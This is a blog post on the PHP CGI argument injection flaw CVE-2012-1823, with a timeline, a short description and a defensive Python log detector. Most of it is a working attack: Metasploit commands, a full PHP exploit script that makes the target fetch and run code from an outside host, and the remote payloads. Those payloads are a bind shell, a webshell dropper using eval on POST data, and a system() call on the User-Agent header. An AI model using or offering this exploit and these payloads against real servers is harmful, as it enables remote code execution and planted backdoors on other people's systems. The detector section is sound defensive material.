CVE-2012-1823 PHP CGI Argument Injection Metasploit Demo


Timeline :

Vulnerability discovered at Nullcon HackIM 2012 by eindbazen on 2012-01-13
Vulnerability reported to the vendor on 2012-01-17
Vulnerability accidentally disclosed on the PHP bug tracking system on 2012-05-03
Coordinated public release of the vulnerability on 2012-05-03
Metasploit PoC provided on 2012-05-04

PoC provided by :

egypt
hdm

Reference(s) :

Affected version(s) :

PHP versions before 5.3.12
PHP versions before 5.4.2

Tested on CentOS release 6.2 (Final) with :

php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012

Description :

When run as a CGI (php-cgi; mod_php and FastCGI/php-fpm deployments are not affected), PHP before 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability: a query string containing no unescaped '=' is handed to the php-cgi binary as command-line arguments. The Metasploit module takes advantage of the -d flag, which sets php.ini directives (here allow_url_include and auto_prepend_file) from the query string, to achieve code execution. From the advisory: “if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary.” The RFC referred to is RFC 3875 (the CGI specification), section 4.4. Note that the first fix shipped in 5.3.12 and 5.4.2 was incomplete and could be bypassed (tracked as CVE-2012-2311); the complete fix landed in 5.3.13 and 5.4.3.
Note : the flaw had been present in PHP's CGI handling for roughly 8 years before disclosure, so it could have been exploited in the wild for that long.
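To make the argv rule concrete, here is an added example (written for this page, not part of the original demo or of the Metasploit module) that models the query-string splitting the advisory describes and then runs it as a detector over a few constructed access-log lines. The IP addresses, paths and log lines are made up for the example.

```python
import re
from urllib.parse import unquote

# Added example, not from the original post. Models how php-cgi, following the
# RFC 3875 rule quoted in the advisory, turns a query string without '=' into
# argv, and flags request lines that carry PHP options. Log lines are constructed.


def cgi_query_to_argv(query):
    """Return the argv php-cgi derives from the query string, or [] when the
    query contains an unescaped '=' (then it is form data, never argv)."""
    if "=" in query:
        return []
    return [unquote(part) for part in query.split("+") if part]


def php_options_injected(query):
    """True when the query would reach php-cgi as argv and some token looks
    like a PHP command-line option. Decoding happens before the check, so an
    encoded '-' ('%2d') is caught as well as a literal one."""
    return any(tok.startswith("-") for tok in cgi_query_to_argv(query))


# Apache combined-log style lines, constructed for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [04/May/2012:10:12:01 +0000] "GET /index.php?page=1&id=5 HTTP/1.1" 200 1523
203.0.113.9 - - [04/May/2012:10:12:07 +0000] "GET /phpinfo.php?-s HTTP/1.1" 200 18211
203.0.113.9 - - [04/May/2012:10:12:09 +0000] "POST /phpinfo.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 64
203.0.113.9 - - [04/May/2012:10:12:11 +0000] "GET /phpinfo.php?%2dd+allow_url_include%3don HTTP/1.1" 500 0
198.51.100.2 - - [04/May/2012:10:13:00 +0000] "GET /search.php?q=foo+bar HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)


def find_arg_injection(log_text):
    """Return (ip, request-target, argv) for every request whose query string
    would be passed to php-cgi as command-line options."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if "?" not in target:
            continue
        query = target.split("?", 1)[1]
        if php_options_injected(query):
            hits.append((m.group("ip"), target, cgi_query_to_argv(query)))
    return hits


if __name__ == "__main__":
    for ip, target, argv in find_arg_injection(SAMPLE_LOG):
        print(f"{ip} {target} -> php-cgi argv {argv}")
```

The predicate mirrors the mod_rewrite workaround PHP published alongside the fix (refuse any query string that contains no '=' but does contain '-' or '%2d'); decoding before the check is what catches the '%2d' form, and `/search.php?q=foo+bar` stays clean because its '=' keeps it out of argv entirely.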

Commands :


use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.178.210
set TARGETURI /phpinfo.php
set PAYLOAD php/exec
set CMD echo \"owned\">/var/www/html/owned.html
exploit



EXPLOIT:


PHP Code:


<?php
/*
 * PHP CGI Argument Injection Exploit CVE-2012-1823
 * by: cfking@90sec.org
 * Team: www.90sec.org
 */
set_time_limit(0);

$help = "
[>] php-cgi Remote code Execution Exploit CVE-2012-1823
[>] by: cfking@90sec.org
[>] Usage:   php {$argv[0]} host index.php <1/2/3> <ip/Command> <port>
[>] Example: php {$argv[0]} 127.0.0.1 / 2
";

if ($argc < 4) exit($help);
print_r("\n[>] PHP CGI Argument Injection Exploit CVE-2012-1823\n[>] by: cfking@90sec.org\n");
$host     = $argv[1];
$filename = $argv[2];

if ($argv[3] == '1') {
    // Mode 1: bind shell. The listening IP:port travels to the remote code in the User-Agent header.
    $port = isset($argv[5]) ? $argv[5] : 4444;
    if (!$argv[4]) exit("\n[-] Please enter IP and PORT\n");
    print "\n[+] Bindshell IP $argv[4] PORT $port\n";
    $payload = $argv[4] . ':' . $port;
    $target  = 'http://www.cj360.cn/plus/cmd.php';
}
if ($argv[3] == '2') {
    // Mode 2: write a webshell (test.php) into the target's document root.
    print "\n[+] Upload backdoor test.php\n";
    $payload = '';
    $target  = 'http://www.cj360.cn/plus/cmd.txt';
}
if ($argv[3] == '3') {
    // Mode 3: run one command, passed to the remote code in the User-Agent header.
    if (!$argv[4]) exit("\n[-] Please enter Command\n");
    print "\n[+] Command $argv[4]\n";
    $payload = $argv[4];
    $target  = 'http://www.cj360.cn/plus/cmds.txt';
}

ob_start();
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");

// No raw '=' in the query string, so php-cgi splits it on '+' and treats it as argv:
// -d allow_url_include=on -d auto_prepend_file=<remote URL> -d disable_functions=off
fwrite($sock, "GET /$filename?-d+allow_url_include%3don+-d+auto_prepend_file%3d$target+-d+disable_functions%3doff HTTP/1.1\r\n");
fwrite($sock, "User-Agent: $payload\r\n");
fwrite($sock, "Host: $host\r\n\r\n");

$headers = "";
while ($str = trim(fgets($sock, 4096)))
    $headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
    $body .= fgets($sock, 4096);
fclose($sock);

echo $body;
ob_end_flush();
?>


Using php://input as the prepended file produced a 500 error, so this exploit uses remote file inclusion instead: allow_url_include is switched on with -d and auto_prepend_file is pointed at a remote URL, so the remote file is fetched and executed before the requested script. The target therefore has to be able to reach that URL, and allow_url_fopen must not be disabled.

Usage: <1/2/3> <ip/Command> <port>

The remote URLs inside the script ($target) can be changed to point at your own server; the three remote files are listed below.
Remote Code :

Bindshell 


PHP Code:


<?php
// The base64 blob holding the bind-shell source is not reproduced on this page.
$target = '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';
echo $code = base64_decode($target);
?>


Upload webshell:


PHP Code:


<?php
// Drop a minimal webshell next to the requested script; commands arrive in the POST parameter "cmd".
$file = fopen("test.php", "w");
fwrite($file, '<?php eval($_POST[\'cmd\'])?>');
fclose($file);
echo "webshell Write successful";
exit;
?>


Command execution:


PHP Code:


<?php
// Run the command the exploit placed in the User-Agent header, then stop before the real script executes.
system($_SERVER["HTTP_USER_AGENT"]);
exit;
?>



Note:

Copies must clearly credit the source, Blog - Hacking

Copyright © 123 H4ck' Blog. Powered by Blogger